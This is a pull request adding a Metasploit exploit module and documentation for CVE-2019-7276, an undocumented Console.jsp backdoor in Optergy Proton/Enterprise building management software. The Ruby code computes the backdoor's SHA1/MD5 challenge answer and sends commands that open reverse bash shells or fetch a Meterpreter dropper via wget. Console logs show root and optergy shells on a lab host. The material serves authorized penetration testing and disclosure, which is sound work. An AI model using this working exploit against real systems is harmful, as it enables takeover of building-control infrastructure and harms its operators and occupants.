### PR TITLE
Optergy BMS Backdoor RCE [CVE-2019-7276]

### DIFF
--- a/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
+++ b/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
@@ -1,0 +1,180 @@
+## Vulnerable Application
+
+This module exploits an undocumented backdoor vulnerability (CVE-2019-7276) in the Optergy Proton and Enterprise
+Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.
+Attackers can exploit this issue by directly navigating to an undocumented backdoor script called `Console.jsp`
+in the tools directory and gain full system access.
+Successful exploitation results in `root` command execution using `sudo` as user `optergy`.
+
+Please check out this [AttackerKB Article](https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276) for more info.
+
+Installing a vulnerable test bed requires a Linux or Windows machine with the vulnerable software loaded.
+Follow instructions [Optergy OVA Download](https://github.com/h00die-gr3y/Metasploit/tree/main/images),
+to download an OVA image with a vulnerable Optergy Proton application (v2.0.3a) installed.
+
+This module has been tested against a Optergy Proton installation with the specifications listed below:
+
+* Optergy Proton
+* Version: `2.0.3a`
+* Linux OS: Debian 7.11
+
+## Verification Steps
+
+1. `use exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-PHP, 1-Unix command, 2-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No additional options.
+
+## Scenarios
+
+### Optergy Proton 2.0.3a on Debian Linux 7.11 - bash reverse shell
+```
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > check
+[+] 192.168.201.31:80 - The target is vulnerable.
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options
+
+Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
+                                       t/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
+                                       s on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.31:43322) at 2023-03-22 12:45:22 +0000
+
+whoami
+root
+uname -a
+Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.96-2 x86_64 GNU/Linux
+exit
+[*] 192.168.201.31 - Command shell session 1 closed.
+```
+### Optergy Proton 2.0.3a on Debian Linux 7.11 - Linux Dropper Meterpreter session
+```
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > set target 1
+target => 1
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options
+
+Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
+                                       t/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
+                                       s on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:8080/JKGheHgpr9TQf
+[*] Client 192.168.201.31 (Wget/1.13.4 (linux-gnu)) requested /JKGheHgpr9TQf
+[*] Sending payload to 192.168.201.31 (Wget/1.13.4 (linux-gnu))
+[*] Sending stage (3045348 bytes) to 192.168.201.31
+[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.31:43377) at 2023-03-22 12:46:57 +0000
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.201.31
+OS           : Debian 7.11 (Linux 3.2.0-4-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > exit
+```
+
+## Limitations
+No limitations identified.

--- a/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
+++ b/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
@@ -25,7 +25,7 @@ This module has been tested against a Optergy Proton installation with the speci
 1. `set RPORT <port>`
 1. `set LHOST <attacker host ip>`
 1. `set LPORT <attacker host port>`
-1. `set TARGET <0-PHP, 1-Unix command, 2-Linux Dropper>`
+1. `set TARGET <0-Unix command, 1-Linux Dropper>`
 1. `exploit`
 1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
 

--- a/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
+++ b/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
@@ -149,14 +149,6 @@ msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable.
 [*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
-[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
-[*] Exploit completed, but no session was created.
-msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
-
-[*] Started reverse TCP handler on 192.168.201.10:4444
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable.
-[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
 [*] Using URL: http://192.168.201.10:8080/JKGheHgpr9TQf
 [*] Client 192.168.201.31 (Wget/1.13.4 (linux-gnu)) requested /JKGheHgpr9TQf
 [*] Sending payload to 192.168.201.31 (Wget/1.13.4 (linux-gnu))

--- a/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
+++ b/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
@@ -30,7 +30,7 @@ This module has been tested against a Optergy Proton installation with the speci
 1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
 
 ## Options
-No additional options.
+Option SUDO can be set to escalate to root privileges. Default setting is false.
 
 ## Scenarios
 
@@ -50,6 +50,7 @@ Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
    RPORT    80               yes       The target port (TCP)
    SSL      false            no        Negotiate SSL/TLS for outgoing connections
    SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   SUDO     false            yes       Set the sudo option to get root privileges
    URIPATH                   no        The URI to use for this exploit (default is random)
    VHOST                     no        HTTP server virtual host
 
@@ -90,7 +91,7 @@ msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
 [*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.31:43322) at 2023-03-22 12:45:22 +0000
 
 whoami
-root
+optergy
 uname -a
 Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.96-2 x86_64 GNU/Linux
 exit
@@ -112,6 +113,7 @@ Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):
    RPORT    80               yes       The target port (TCP)
    SSL      false            no        Negotiate SSL/TLS for outgoing connections
    SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   SUDO     false            yes       Set the sudo option to get root privileges
    URIPATH                   no        The URI to use for this exploit (default is random)
    VHOST                     no        HTTP server virtual host
 
@@ -158,7 +160,7 @@ msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit
 [*] Server stopped.
 
 meterpreter > getuid
-Server username: root
+Server username: optergy
 meterpreter > sysinfo
 Computer     : 192.168.201.31
 OS           : Debian 7.11 (Linux 3.2.0-4-amd64)

--- a/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
+++ b/documentation/modules/exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.md
@@ -8,7 +8,7 @@ Successful exploitation results in `root` command execution using `sudo` as user
 
 Please check out this [AttackerKB Article](https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276) for more info.
 
-Installing a vulnerable test bed requires a Linux or Windows machine with the vulnerable software loaded.
+Installing a vulnerable test bed requires a Linux machine with the vulnerable software loaded.
 Follow instructions [Optergy OVA Download](https://github.com/h00die-gr3y/Metasploit/tree/main/images),
 to download an OVA image with a vulnerable Optergy Proton application (v2.0.3a) installed.
 

--- a/modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb
+++ b/modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb
@@ -1,0 +1,154 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Optergy Proton and Enterprise BMS Command Injection using a backdoor',
+        'Description' => %q{
+          This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise
+          Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.
+          Attackers can exploit this issue by directly navigating to an undocumented backdoor script
+          called Console.jsp in the tools directory and gain full system access.
+          Successful exploitation results in `root` command execution using `sudo` as user `optergy`.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor
+          'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery
+        ],
+        'References' => [
+          [ 'CVE', '2019-7276'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],
+          [ 'URL', 'https://optergy.com/products/proton/' ],
+          [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],
+          [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],
+          [ 'EDB', '47641'],
+          [ 'PACKETSTORM', '155258']
+        ],
+        'DisclosureDate' => '2019-11-05',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => { 'BadChars' => "\x20" },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Step 1: get the challenge and compute the response answer for the backdoor execution
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')
+    })
+    if res.nil? || (res.code != 200)
+      return nil
+    else
+      # Get and create a challenge response
+      res_json = res.get_json_document
+      return nil if res_json.nil? || res_json.blank?
+
+      # Get the challenge
+      challenge = res_json['response']['message']
+      # Make SHA1 hash from received challenge
+      h1 = Digest::SHA1.hexdigest challenge
+      # Make MD5 hash from SHA1 hash
+      h2 = Digest::MD5.hexdigest h1
+      # Combine MD5 hash and SHA1 hash as answer (response) to the challenge
+      answer = h1 + h2
+    end
+
+    # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.
+    if target['Type'] == :linux_dropper
+      cmd = cmd.gsub(' ') { '${IFS}' }
+    end
+    payload = "sudo bash -c #{cmd}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'command' => payload,
+        'challenge' => challenge,
+        'answer' => answer
+      }
+    })
+    if res.nil? || (res.code != 200)
+      return nil
+    else
+      # get result and return the command response
+      res_json = res.get_json_document
+      return nil if res_json.nil? || res_json.blank?
+
+      res_cmd_output = res_json['response']['message']
+      return res_cmd_output
+    end
+  end
+
+  # Checking if the target is vulnerable by executing the whoami command via the backdoor
+  def check
+    res = execute_command('whoami')
+    return Exploit::CheckCode::Safe unless res && res.chomp == 'root'
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd
+      res = execute_command(payload.encoded)
+      fail_with(Failure::PayloadFailed, "#{datastore['PAYLOAD']} failed.") if res.nil?
+    when :linux_dropper
+      # Don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb
+++ b/modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb
@@ -78,6 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+    register_options(
+      [
+        OptBool.new('SUDO', [ true, 'Set the sudo option to get root privileges', false ])
+      ]
+    )
   end
 
   def execute_command(cmd, _opts = {})
@@ -107,7 +112,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if target['Type'] == :linux_dropper
       cmd = cmd.gsub(' ') { '${IFS}' }
     end
-    payload = "sudo bash -c #{cmd}"
+
+    if datastore['SUDO']
+      payload = "sudo bash -c #{cmd}"
+    else
+      payload = "bash -c #{cmd}"
+    end
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -134,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Checking if the target is vulnerable by executing the whoami command via the backdoor
   def check
     res = execute_command('whoami')
-    return Exploit::CheckCode::Safe unless res && res.chomp == 'root'
+    return Exploit::CheckCode::Safe unless res && (res.chomp == 'root' || res.chomp == 'optergy')
 
     Exploit::CheckCode::Vulnerable
   end


### PR DESCRIPTION
This module exploits an undocumented backdoor vulnerability (CVE-2019-7276) in the Optergy Proton and Enterprise Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.
Attackers can exploit this issue by directly navigating to an undocumented backdoor script called `Console.jsp` in the tools directory and gain full system access.
Successful exploitation results in `root` command execution using `sudo` as user `optergy`.

Please check out this [AttackerKB Article](https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276) for more info.

Installing a vulnerable test bed requires a Linux machine with the vulnerable software loaded.
Follow instructions [Optergy OVA Download](https://github.com/h00die-gr3y/Metasploit/tree/main/images), to download an OVA image with a vulnerable Optergy Proton application (v2.0.3a) installed.

This module has been tested against a Optergy Proton installation with the specifications listed below:

* Optergy Proton
* Version: `2.0.3a`
* Linux OS: Debian 7.11

- [ ] `use exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ]  `set RPORT <port>`
- [ ] `set LHOST <attacker host ip>`
- [ ] `set LPORT <attacker host port>`
- [ ] `set TARGET <0-Unix command, 1-Linux Dropper>`
- [ ] `exploit`

You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.

## Options
No additional options.

## Scenarios

### Optergy Proton 2.0.3a on Debian Linux 7.11 - bash reverse shell
```
msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > check
[+] 192.168.201.31:80 - The target is vulnerable.
msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options

Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
                                       t/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   SUDO     false            yes       Set the sudo option to get root privileges
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
                                       s on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.31:43322) at 2023-03-22 12:45:22 +0000

whoami
optergy
uname -a
Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.96-2 x86_64 GNU/Linux
exit
[*] 192.168.201.31 - Command shell session 1 closed.
```
### Optergy Proton 2.0.3a on Debian Linux 7.11 - Linux Dropper Meterpreter session
```
msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > set target 1
target => 1
msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > options

Module options (exploit/linux/http/optergy_bms_backdoor_rce_cve_2019_7276):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.201.31   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploi
                                       t/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   SUDO     false            yes       Set the sudo option to get root privileges
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an addres
                                       s on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.201.10   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/optergy_bms_backdoor_rce_cve_2019_7276) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:8080/JKGheHgpr9TQf
[*] Client 192.168.201.31 (Wget/1.13.4 (linux-gnu)) requested /JKGheHgpr9TQf
[*] Sending payload to 192.168.201.31 (Wget/1.13.4 (linux-gnu))
[*] Sending stage (3045348 bytes) to 192.168.201.31
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.31:43377) at 2023-03-22 12:46:57 +0000
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: optergy
meterpreter > sysinfo
Computer     : 192.168.201.31
OS           : Debian 7.11 (Linux 3.2.0-4-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
```

## Limitations
No limitations identified.
